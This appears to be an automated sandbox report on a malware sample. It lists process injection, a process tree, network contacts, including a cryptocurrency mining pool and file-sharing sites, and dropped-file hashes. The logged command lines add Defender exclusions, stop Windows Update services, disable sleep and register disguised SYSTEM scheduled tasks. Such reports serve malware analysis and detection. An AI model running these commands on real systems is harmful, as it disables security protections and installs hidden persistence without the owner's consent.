PID 1736 wrote to memory of 5080 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1736 wrote to memory of 5080 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4148 wrote to memory of 420 N/A C:\Users\Admin\AppData\Local\Temp\cc.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4148 wrote to memory of 420 N/A C:\Users\Admin\AppData\Local\Temp\cc.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 420 wrote to memory of 4676 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 420 wrote to memory of 4676 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 420 wrote to memory of 764 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 420 wrote to memory of 764 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 420 wrote to memory of 764 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 420 wrote to memory of 764 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 420 wrote to memory of 764 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 420 wrote to memory of 764 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 420 wrote to memory of 764 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 420 wrote to memory of 764 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 420 wrote to memory of 764 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 420 wrote to memory of 764 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 420 wrote to memory of 764 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 420 wrote to memory of 1968 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 420 wrote to memory of 4804 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\5b062ad0d2fa22af5dbee5d5f35b469b880d6d39fb90a3b08044b490eeac207d.exe

"C:\Users\Admin\AppData\Local\Temp\5b062ad0d2fa22af5dbee5d5f35b469b880d6d39fb90a3b08044b490eeac207d.exe"

C:\Users\Admin\AppData\Local\Temp\mi.exe

"C:\Users\Admin\AppData\Local\Temp\mi.exe"

C:\Users\Admin\AppData\Local\Temp\cli.exe

"C:\Users\Admin\AppData\Local\Temp\cli.exe"

C:\Windows\Temp\setup.exe

"C:\Windows\Temp\setup.exe"

C:\Users\Admin\AppData\Local\Temp\cc.exe

"C:\Users\Admin\AppData\Local\Temp\cc.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1736 -s 288

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data0RBMC" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data0RBMC\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data0RBMC" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xd4,0xd8,0xdc,0xb0,0xe0,0x7ffcfdb69758,0x7ffcfdb69768,0x7ffcfdb69778

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=16179 --headless --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data0RBMC" --profile-directory="Default"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --headless --use-angle=swiftshader-webgl --headless --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --mojo-platform-channel-handle=1248 --field-trial-handle=1332,i,11278361648754438957,2436689740279264625,131072 --disable-features=PaintHolding /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --use-angle=swiftshader-webgl --use-gl=angle --headless --mojo-platform-channel-handle=1544 --field-trial-handle=1332,i,11278361648754438957,2436689740279264625,131072 --disable-features=PaintHolding /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --first-renderer-process --remote-debugging-port=16179 --allow-pre-commit-input --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=4 --mojo-platform-channel-handle=1836 --field-trial-handle=1332,i,11278361648754438957,2436689740279264625,131072 --disable-features=PaintHolding /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --remote-debugging-port=16179 --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2176 --field-trial-handle=1332,i,11278361648754438957,2436689740279264625,131072 --disable-features=PaintHolding /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --remote-debugging-port=16179 --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2440 --field-trial-handle=1332,i,11278361648754438957,2436689740279264625,131072 --disable-features=PaintHolding /prefetch:1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --remote-debugging-port=16179 --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=3028 --field-trial-handle=1332,i,11278361648754438957,2436689740279264625,131072 --disable-features=PaintHolding /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --remote-debugging-port=16179 --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=3204 --field-trial-handle=1332,i,11278361648754438957,2436689740279264625,131072 --disable-features=PaintHolding /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --remote-debugging-port=16179 --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --mojo-platform-channel-handle=3336 --field-trial-handle=1332,i,11278361648754438957,2436689740279264625,131072 --disable-features=PaintHolding /prefetch:1

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#syxapd#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --use-angle=swiftshader-webgl --use-gl=angle --headless --mojo-platform-channel-handle=2544 --field-trial-handle=1332,i,11278361648754438957,2436689740279264625,131072 --disable-features=PaintHolding /prefetch:8

C:\Windows\system32\AUDIODG.EXE

C:\Windows\system32\AUDIODG.EXE 0x3bc

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "Start-Process <#yyfbtmprllefmzto#> powershell <#yyfbtmprllefmzto#> -Verb <#yyfbtmprllefmzto#> runAs" -WindowStyle hidden -Argument 'Add-MpPreference -ExclusionPath $env:SystemDrive -ExclusionExtension .exe, .dll -Force'

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:SystemDrive -ExclusionExtension .exe, .dll -Force

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /sc daily /st 10:59 /f /tn "AppLaunch" /tr "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle hidden Add-MpPreference -ExclusionPath "C:\ProgramData\sY2NsQjNsETOsATOsIDOsUWOsIWOsMDOsU2NsUWO\MTA1.exe" -Force

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /sc daily /st 10:59 /f /tn WindowsSecurityUpdate_MTA1 /tr "C:\ProgramData\sY2NsQjNsETOsATOsIDOsUWOsIWOsMDOsU2NsUWO\MTA1.exe"

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#syxapd#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\explorer.exe

C:\Windows\explorer.exe

Network

Country Destination Domain Proto
NL 209.250.248.11:33522 tcp
US 8.8.8.8:53 11.248.250.209.in-addr.arpa udp
US 8.8.8.8:53 transfer.sh udp
DE 144.76.136.153:443 transfer.sh tcp
US 8.8.8.8:53 153.136.76.144.in-addr.arpa udp
US 8.8.8.8:53 154.25.221.88.in-addr.arpa udp
US 8.8.8.8:53 www.microsoft.com udp
NL 104.85.1.163:80 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 163.1.85.104.in-addr.arpa udp
US 8.8.8.8:53 254.23.238.8.in-addr.arpa udp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
RU 185.159.129.168:80 tcp
RU 185.149.146.118:80 tcp
RU 77.91.77.144:80 tcp
US 8.8.8.8:53 196.168.217.172.in-addr.arpa udp
US 8.8.8.8:53 youtube.com udp
NL 216.58.214.14:443 youtube.com tcp
US 8.8.8.8:53 ogs.google.com udp
NL 142.250.179.206:443 ogs.google.com tcp
US 8.8.8.8:53 apis.google.com udp
US 8.8.8.8:53 i.ytimg.com udp
NL 142.251.36.22:443 i.ytimg.com tcp
US 8.8.8.8:53 play.google.com udp
US 8.8.8.8:53 195.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 14.214.58.216.in-addr.arpa udp
NL 142.251.36.14:443 play.google.com tcp
US 8.8.8.8:53 206.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 206.23.217.172.in-addr.arpa udp
US 8.8.8.8:53 22.36.251.142.in-addr.arpa udp
US 8.8.8.8:53 accounts.google.com udp
NL 142.250.179.141:443 accounts.google.com tcp
NL 142.251.36.14:443 play.google.com udp
NL 142.250.179.141:443 accounts.google.com udp
NL 142.251.36.14:443 play.google.com udp
US 8.8.8.8:53 131.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 106.208.58.216.in-addr.arpa udp
US 8.8.8.8:53 14.36.251.142.in-addr.arpa udp
US 8.8.8.8:53 141.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 194.168.217.172.in-addr.arpa udp
US 8.8.8.8:53 googleads.g.doubleclick.net udp
NL 142.250.179.162:443 googleads.g.doubleclick.net tcp
US 8.8.8.8:53 googleads.g.doubleclick.net udp
US 8.8.8.8:53 162.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 i.ytimg.com udp
US 8.8.8.8:53 yt3.ggpht.com udp
NL 142.251.36.22:443 i.ytimg.com udp
NL 142.251.36.1:443 yt3.ggpht.com tcp
NL 142.251.36.1:443 yt3.ggpht.com udp
US 8.8.8.8:53 1.36.251.142.in-addr.arpa udp
US 8.8.8.8:53 jnn-pa.googleapis.com udp
US 8.8.8.8:53 static.doubleclick.net udp
NL 142.250.179.138:443 jnn-pa.googleapis.com tcp
NL 142.251.36.6:443 static.doubleclick.net tcp
US 8.8.8.8:53 138.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 6.36.251.142.in-addr.arpa udp
NL 142.250.179.138:443 jnn-pa.googleapis.com udp
US 8.8.8.8:53 accounts.google.com udp
NL 142.250.179.141:443 accounts.google.com tcp
N/A 127.0.0.1:16179 tcp
US 8.8.8.8:53 pastebin.com udp
US 104.20.68.143:80 pastebin.com tcp
US 104.20.68.143:443 pastebin.com tcp
US 8.8.8.8:53 143.68.20.104.in-addr.arpa udp
RU 46.29.235.84:80 46.29.235.84 tcp
US 8.8.8.8:53 84.235.29.46.in-addr.arpa udp
US 8.8.8.8:53 stratum-eu.rplant.xyz udp
FR 141.94.192.217:17056 stratum-eu.rplant.xyz tcp
US 8.8.8.8:53 217.192.94.141.in-addr.arpa udp
US 8.8.8.8:53 8.3.197.209.in-addr.arpa udp
US 8.8.8.8:53 15.173.189.20.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\mi.exe

MD5 80b0b41decb53a01e8c87def18400267
SHA1 885f327c4e91065486137ca96105190f7a29d0f9
SHA256 10d8e7a04d05a2690a7e0cc30c10028eda0af680a8787f24cb9668ccbe46e1e1
SHA512 19bd6c9ab0cfbba34e722f508fcb4a99ae78a0d71ef664b186034c78eda09a61ae63455f7958dd5a50ec6432c822b23582ca7c87309a37fcbbb28e5facf56c8e

C:\Users\Admin\AppData\Local\Temp\cli.exe

MD5 b78141a544759e1a07740aa28b35584c
SHA1 af95ccd7d12c7ed7bdc6782373302118d2ebe3a8
SHA256 e268b72e92c9d9af52c25f4d7643bd96c84172fadb4e7a300091eb287ee3a35d
SHA512 2f83ef2eaf8951d392f32405dd9c2555be803f63cbdb9118c4204ad148a254a19aa593082a2f5c7a1b962329df08fede026d0715513adf26d838f043fd451959

C:\Users\Admin\AppData\Local\Temp\cc.exe

MD5 858f82fe9166c34b6709a3adfe6a625f
SHA1 63275e4b77e0fe6fa6f1db716b5963b69b68f8a5
SHA256 8ec2c1bb10e05a5129269488b53a46c6b5be3691c61ef7da7c6eecf1c0444b28
SHA512 1338082ebb6bf658125cd6d72f5885c78865c1abbed50fd10317dacaf41a450eb98b949631f1a1b94a67d335b23cfc0fa78d0d8db3d726adf2a57af50307b89e

C:\Windows\Temp\setup.exe

MD5 84741bc02d2e9226a943aa03b6a4568d
SHA1 617d01316011faf77fba30d49ae1e86ff988380a
SHA256 fa1f99fdd5beab9a996ff3cb58886dc1811fd6e1ba444aee2d80d0d9b9d5ec93
SHA512 1c95842c88f7d17a07fa2480281cbdff27136525c80a00387536a0843e040adcac37fd13166ab7f48398d28fd297c92d5c0d0ef4066e68297ea9f30179754379

C:\Users\Admin\AppData\Local\Google\Chrome\User Data0RBMC\CrashpadMetrics-active.pma

MD5 03c4f648043a88675a920425d824e1b3
SHA1 b98ce64ab5f7a187d19deb8f24ca4ab5d9720a6d
SHA256 f91dbb7c64b4582f529c968c480d2dce1c8727390482f31e4355a27bb3d9b450
SHA512 2473f21cf8747ec981db18fb42726c767bbcca8dd89fd05ffd2d844206a6e86da672967462ac714e6fb43cc84ac35fffcec7ddc43a9357c1f8ed9d14105e9192

C:\Users\Admin\AppData\Local\Google\Chrome\User Data0RBMC\Local State

MD5 f0bb114490927ab62b2e12c58df59077
SHA1 d6680f51ccf36cc0e197ea9f1bdf9cfa52c0b541
SHA256 bac32435b630bff674646e4b942348bebefd06306b273d919c6ae3f557d7d94f
SHA512 cfdbf26f5a12f8cd312067bb392552fe82c42ca74206d8578f110d512fd430a68073889115eb5799cd072e0f1d8042fc3705f58fc9aea355116a77e157321feb

\??\pipe\crashpad_420_DHFNGOHKETZSPWOG

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Google\Chrome\User Data0RBMC\Default\Local Storage\leveldb\MANIFEST-000001

MD5 5af87dfd673ba2115e2fcf5cfdb727ab
SHA1 d5b5bbf396dc291274584ef71f444f420b6056f1
SHA256 f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4
SHA512 de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

C:\Users\Admin\AppData\Local\Google\Chrome\User Data0RBMC\Default\Local Storage\leveldb\CURRENT

MD5 46295cac801e5d4857d09837238a6394
SHA1 44e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA256 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA512 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

C:\Users\Admin\AppData\Local\Google\Chrome\User Data0RBMC\Default\Local Storage\leveldb\LOG

MD5 72cd2018bc0afcf7d3ffa62db78f1de5
SHA1 a8422b43709e6c62daa4ff97dc7a8611cedd3cd1
SHA256 40752426c6d69b190463076e864e933f10c49650322f33faf3e13a198edf037b
SHA512 26a3a95d147780d59bea4c2c74783180300cefc0ae1cf2c2ad02277d250f8e61e6df3db4cd4c9c31440fa8f636f5cd9de1bb99b308b4ec921289b43fdaab09b3

C:\Users\Admin\AppData\Local\Google\Chrome\User Data0RBMC\Default\Local Storage\leveldb\LOG.old

MD5 28f23e1173a2f5420b8c577172b935e0
SHA1 f30aed4a3fcf4e089c112a2cfef4b16e1b19cfe3
SHA256 cfe91e2c0dab8ffa8c1350c15c9d30d297ce20bae24a0049560010d9328e8302
SHA512 4eda7103f7a43fbe16da91233f50ba7e4f4cb5be08a35bb750f76401d5ad9afb7520a4d9449e5d8a253d997d596a43658d94316254fa33332b4eeb176f282e98

C:\Users\Admin\AppData\Local\Google\Chrome\User Data0RBMC\Default\Network\Cookies

MD5 c9ff7748d8fcef4cf84a5501e996a641
SHA1 02867e5010f62f97ebb0cfb32cb3ede9449fe0c9
SHA256 4d3f3194cb1133437aa69bb880c8cbb55ddf06ff61a88ca6c3f1bbfbfd35d988
SHA512 d36054499869a8f56ac8547ccd5455f1252c24e17d2b185955390b32da7e2a732ace4e0f30f9493fcc61425a2e31ed623465f998f41af69423ee0e3ed1483a73

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ci3dwswj.nbm.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

C:\Users\Admin\AppData\Local\Google\Chrome\User Data0RBMC\Default\IndexedDB\https_www.youtube.com_0.indexeddb.leveldb\000001.dbtmp

MD5 46295cac801e5d4857d09837238a6394
SHA1 44e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA256 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA512 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

C:\Windows\system32\drivers\etc\hosts

MD5 2d29fd3ae57f422e2b2121141dc82253
SHA1 c2464c857779c0ab4f5e766f5028fcc651a6c6b7
SHA256 80a60d7ec533d820de20bcedeb41319e7b1def548b6ea73ddbd69455bac4e7a4
SHA512 077a5c554663be7b71f181d961f5c98c732bc296dc015ffee30768a648bee3aad62c39c352cf2947432be19519906aeac7dfaf2557d309bb460732abb7fdbc68

C:\Users\Admin\AppData\Local\Google\Chrome\User Data0RBMC\Default\Service Worker\Database\MANIFEST-000001

MD5 5af87dfd673ba2115e2fcf5cfdb727ab
SHA1 d5b5bbf396dc291274584ef71f444f420b6056f1
SHA256 f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4
SHA512 de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

C:\Users\Admin\AppData\Local\Google\Chrome\User Data0RBMC\Default\Service Worker\ScriptCache\index

MD5 54cb446f628b2ea4a5bce5769910512e
SHA1 c27ca848427fe87f5cf4d0e0e3cd57151b0d820d
SHA256 fbcfe23a2ecb82b7100c50811691dde0a33aa3da8d176be9882a9db485dc0f2d
SHA512 8f6ed2e91aed9bd415789b1dbe591e7eab29f3f1b48fdfa5e864d7bf4ae554acc5d82b4097a770dabc228523253623e4296c5023cf48252e1b94382c43123cb0

C:\Users\Admin\AppData\Local\Google\Chrome\User Data0RBMC\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

MD5 4ec69a2607314474dc3b92fd85a8709b
SHA1 a84ebba1513f6e35010d14d942bca89bc23b5301
SHA256 6c0ccab57b62a8a7abd853b1566157d6e4f0c3f3198abbef3c2a1149275f789b
SHA512 8ef41752fbc8ab8123807cb4263686da04c5a20df3f46b3b49af8fc4d7615f4a3a5b6cb43f49c223cc3f82bac26a0d654d7d402f626a66f0e31d625231ef0272

C:\Users\Admin\AppData\Local\Google\Chrome\User Data0RBMC\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

MD5 6f47529c7ab02795da3a18ce7eb210fe
SHA1 345d9f0f6a23e7478ff305189a0acfd48a17d9c6
SHA256 fc0ff57d8286b29ab6420315df9ad669c6d4092f783ea7abcc794e5271d79045
SHA512 d367773b330744aea94a4e55fba52bacd766ee0d5bcfc5c984e139b551c71031dfaff29d317b5acb3c83b6f7d844624020f7ab60e099877ea62557317cb065fe

C:\Users\Admin\AppData\Local\Google\Chrome\User Data0RBMC\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt~RFe5842ff.TMP

MD5 0f6860aaa98c4a7e61e9ed52a639a007
SHA1 2fbbd3876aec1b7fc42c9e2a62609cda73258574
SHA256 8c01f79c93469db4bdd7b76f88b4685b90317b931ff86bcf060e27a4ef06331c
SHA512 309b5979b18c83ca33271b29c7d6ae16a8512467be6eae662af8415c3f02239b32c667fd78c54e3f58de63d9fb81ff8faa627de98255ef38c59104557d2be5a5

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 ad5cd538ca58cb28ede39c108acb5785
SHA1 1ae910026f3dbe90ed025e9e96ead2b5399be877
SHA256 c9e6cb04d6c893458d5a7e12eb575cf97c3172f5e312b1f63a667cbbc5f0c033
SHA512 c066c5d9b276a68fa636647bb29aea05bfa2292217bc77f5324d9c1d93117772ee8277e1f7cff91ec8d6b7c05ca078f929cecfdbb09582522a9067f54740af13

memory/2740-552-0x00007FFCEC850000-0x00007FFCED23C000-memory.dmp

memory/2740-555-0x000001C077590000-0x000001C0775A0000-memory.dmp

memory/2740-557-0x000001C077590000-0x000001C0775A0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 529f7243a42d4db9a29a107eccb442b3
SHA1 019a057355bff39f9b2f32ea6eaf58f538d46633
SHA256 1e3d2c43812bb80c9aa0038a2ada7077ad68001d3b13a20e26fe814981e086f8
SHA512 9945f63f4cf3fdba4a5e85f2843d7053c795f967902f921ed5afa0518498a0797daff13d710aceeb7bbbe4325c8e107a78a20f255492f7fabee51913ff9671b2

memory/2740-584-0x000001C077590000-0x000001C0775A0000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data0RBMC\Default\Service Worker\ScriptCache\index-dir\the-real-index

MD5 ae0f855b3e72a8a3b42fd39a9997d9e1
SHA1 d6135d140d9dedd41ba569c2fdb62cb47919eeaa
SHA256 836d249fff7171c0ccdb0beffedc30b54ad672edc79b4e047b0ab0a0efa55f87
